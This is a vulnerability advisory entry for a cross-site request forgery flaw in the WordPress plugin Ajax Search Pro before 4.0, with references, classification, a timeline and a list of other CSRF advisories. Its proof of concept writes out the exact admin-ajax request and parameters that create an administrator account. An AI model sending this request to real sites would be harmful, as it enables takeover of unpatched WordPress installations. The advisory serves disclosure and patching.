Ajax Search Pro < 4.0 – Cross-Site Request Forgery (CSRF) Add User | Plugin Vulnerabilities

Description

The ajax-search-pro WordPress plugin was affected by a Cross-Site Request Forgery (CSRF) Add User security vulnerability.

Proof of Concept

This will register an administrator with username "xADMIN" and password "xPASS":

POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

With POST data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator

Affects Plugins

ajax-search-pro

Fixed in 4.0

References

URL

https://packetstormsecurity.com/files/#130955/

URL

https://web.archive.org/web/20150619084745/https://research.evex.pw/?vuln=9

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Submitter

A. Samman

Submitter twitter

Verified

No

WPVDB ID

37e6ebfc-a927-4d8b-85bf-e940ac16c604

Timeline

Publicly Published

2015-03-18 (about 9 years ago)

Added

2015-03-21 (about 9 years ago)

Last Updated

2019-10-21 (about 4 years ago)

Other

Published

Title

Published

2024-02-16

Title

Microsoft Clarity < 0.9.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-02-23

Title

ChatBot < 4.3.0 - Settings Reset via CSRF

Published

2023-03-03

Title

Classic Editor and Classic Widgets < 1.2.6 - Settings Update via CSRF

Published

2023-10-16

Title

Eupago Gateway For Woocommerce < 3.1.10 - CSRF

Published

2020-09-16

Title

Radio Buttons for Taxonomies < 2.0.6 - Cross-Site Request Forgery